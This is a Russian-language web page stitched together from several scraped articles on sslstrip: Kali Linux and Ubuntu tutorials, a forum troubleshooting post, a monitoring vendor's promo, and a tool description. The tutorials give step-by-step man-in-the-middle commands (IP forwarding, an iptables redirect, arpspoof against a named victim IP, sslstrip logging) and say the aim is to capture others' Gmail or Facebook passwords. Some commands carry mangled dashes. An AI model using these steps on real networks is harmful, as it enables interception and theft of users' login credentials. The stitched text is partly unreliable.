Руководства, Инструкции, Бланки

Sslstrip инструкция

Категория: Инструкции

Описание

Kali Linux: Используем sslstrip для перехвата пароля - theCurrent - говорим про Linux, Joomla, Android, взлом и безопасность

Kali Linux: Используем sslstrip для перехвата пароля

Утилита sslstrip перехватывает http-трафик с компьютера в локальной сети и таким образом позволяет нам разузнать пароли от каких-нибудь сайтов. Как же пользоваться этой утилитой?

Для начала откроем терминал и выполним команду sslstrip -h для того чтобы узнать все опции утилиты.

Перед тем как начать работать с sslstrip нам нужно проделать кое-какие действия

1. Нам нужно включить IP Forwarding

echo ‘1’ > /proc/sys/net/ipv4/ip_forward

2. Включить перенаправление запросов с порта 80 на 8080

iptables –t nat –A PREROUTING –p tcp –destination-port 80 –j REDIRECT –to-port 8080

3. Определяем наш шлюз netstat -nr

4. Выясняем ip-адрес жертвы (в моем случае это компьютер под управлением Windows XP с IP-адресом 192.168.71.128)

5. Перенаправляем весь http-трафик с нашего компьютера на шлюз

arpspoof –i eth0 –t 192.168.71.128 –r 192.168.71.2

Теперь, не закрывая этого окна терминала, открываем еще одно, и запускаем в нем прослушку порта 8080 с помощью sslstrip:

sslstrip –l 8080

Теперь, я на компьютере жертвы захожу в гугло-почту:

После того как я зашел в почту, на компьютере с Kali Linux в окне терминала с работающим sslstrip нажимаю ctrl+c для отмены операции. Вся полученная информация будет сохранена в файл sslstrip.log

Посмотрим содержимое файла:

cat sslstrip.log - логин и пароль обведены в красную рамку

Вот так это все работает, удачи!

Sslstrip инструкция:

  • скачать
  • скачать
  • Другие статьи

    Sslstrip arpspoof, помогите решить проблему

    sslstrip 0.9 by Moxie Marlinspike running.
    Unhandled Error
    Traceback (most recent call last):
    File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
    return callWithContext(<"system": lp>, func, *args, **kw)

    Короче тут все зависит от версии питона и sslstrip.
    sslstrip пользует python 2.6 как правило, sslstrip 0.9 работает на python 2.5 и выше (у тебя 2.7 можешь попробовать сделайт даунгрейд до 2.6)

    1)Измени скрипт sslstrip.py
    строку #!/usr/bin/env python
    на #!/usr/bin/python2.6
    2)попробуй запускать так sslstrip -p -l 8888 -w logger.log с или так python sslstrip.py -p -l 8888 -w logger.log
    3) Можешь попробовать переустановить sslstrip (и запускать с такими флагами sslstrip -p -k -f)
    где -p логируются только POST запросы
    -k убивает сессии
    -f зменяет иконку защищенного соединения (убирает замок)

    Последний раз редактировалось Suicidemouse; 15.12.2014 в 23:49.

    «Вози кусты и героин, а то останешься рабом» © Буравчик

    PTraffer - sslstrip шаг за шагом на Ubuntu

    Контроль Skype Контроль HTTPs Контроль соцсетей Любые сети Любые масштабы Единая база Без настроек Без оповещений Без агентов Автоматический анализ Оповещения о нарушениях Мгновенный поиск pTraffer - sslstrip шаг за шагом на Ubuntu

    SLStrip используется для атаки MITM чтобы получить доступ к сайтам с SSL, например auth.mail.ru passport.yandex.ru
    Также Вам мрожет быть интересен прозрачный контроль https

    Необходим следующий набор ПО:
    • SSLStrip
    • ARPSpoof
    • Ettercap
    • Ubuntu Linux

    Подключение к Интернет )))
    Цель должна быть в той же подсети
    Шаг 1: - Сначала загружаем SSLStrip с http://www.thoughtcrime.org/software/sslstrip/

  • Шаг 2: - Распаковать скачанные файлы "tar -zxvf sslstrip-0.4.tar.gz"

  • Шаг 3: - Устанавливаем SSLStrip "python setup.py build"

  • Шаг 4: - Установите SSLStrip командой "sudo Python setup.py install", соответственно понадобятся права рута.

  • Шаг 5: - Ставим ARPSpoof "sudo apt-get install dsniff"

  • Шаг 6: - Ставим Ettercap "sudo apt-get install ettercap"

  • Шаг 7: - В данном случае адрес цели - 172.168.1.3


  • Шаг 8: - Убедитесь, что шлюз по умолчанию у Вас такой же как у жертвы

  • Шаг 9: - Открываем три вкладки в терминале 0 в первой запускаем спуфер "sudo arpspoof -t 172.168.1.4 172.168.1.1"

  • Шаг 10: - На второй вкладке перекидываем запросы на порт 1000 "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000" ну и, собственно, нужно запустить "sslstrip"

  • Шаг 11: - В третьей кладке запускаем ettercap

    Шаг 12: - Ждём пока цель зайдут на gmail или аналогичный сайт с авторизацией по SSL
  • 1) описание компонентов 2) посмотреть цены 3) Получить демо Вопросы? Мы решим Вашу задачу!

    Sslstrip ловля паролей в локальной сети

    sslstrip ловля паролей в локальной сети

    Sep 25, 2011 by insider

    Как известно, протокол SSL защищен и бояться за свои пароли, передаваемые по нему, не стоит. Так ли это? Нет! Если вы находитесь в одной локальной сети со своей целью, то получить его пароли для вас будет не проблема. Перейдем от лирики к практике.

    У нас есть два компьютера в локальной сети и роутер, соединяющий их и дающий выход в глобальную сеть. Предположим, что мы — атакующий компьютер с IP адресом 192.168.1.101. Наша цель — Вася Пупкин с IP адресом 192.168.1.102. который хочет залогиниться в www.facebook.com .

    1) Узнаем адрес роутера:

    2) Включим на машине режим перенаправления пакетов:

    3) Настроим iptables для перенаправления http -трафика на порт 1000 :

    4) Теперь нам надо заставить цель поверить, что мы и есть тот самый роутер. Запускаем для этого arpspoof :

    5) Проверим тело sslstrip на наличие правильной версии Python :

    Если стоит /usr/bin/env python меняем на /usr/bin/python2.6

    6) И вот запускаем сам sslstrip для поимки пароля:

    Расшифруем параметры:
    -a ловится весь http и ssl траффик
    -l слушаем на 1000 порту, на который мы делали перенаправление
    -w запись лога в файл /root/log.txt

    7) Вася заходит на facebook. вводит мыло и пароль.

    8) Мы анализируем лог:

    Собственно мы получили, что хотели. Обучающе-остерегающий видос внизу:

    SSLstrip (SSLStrip ) - Инструменты Kali Linux

    SSLstrip (SSLStrip+) Описание SSLstrip

    sslstrip — это инструмент, который незаметно перехватывает HTTP трафик в сети, следит за HTTPS ссылками и редиректами, а затем сопоставляет эти ссылки их HTTP двойникам или омографически сходным HTTPS сслыкам. Он также поддерживает режимы для подачи иконки сайта (favicon), которая выглядит как иконка замка, выборочное ведение журнала и отклонение сессий.

    Автор: Moxie Marlinspike

    Описание SSLStrip+

    Это новая версия SSLstrip с новой функцией обхода механизма защиты HTTP Strict Transport Security (HSTS).

    Эта версия, как и оригинальная, меняет HTTPS на HTTP плюс имя хоста в html коде для избежания HSTS.

    Для того, чтобы она работала, также нужен DNS сервер, который возвращает вспять изменения, сделанный прокси. Таким DNS сервером является dns2proxy.

    Домашняя страница: https://github.com/singe/sslstrip2/ (доступный форк). Первоначально программа была опубликована автором по адресу https://github.com/LeonardoNve/sslstrip2, но из-за нового испанского закона, запрещающего публикацию "наступательных" инструментов/техник в сфере безопасности, он был вынужден удалить исходный код.

    Справка по SSLstrip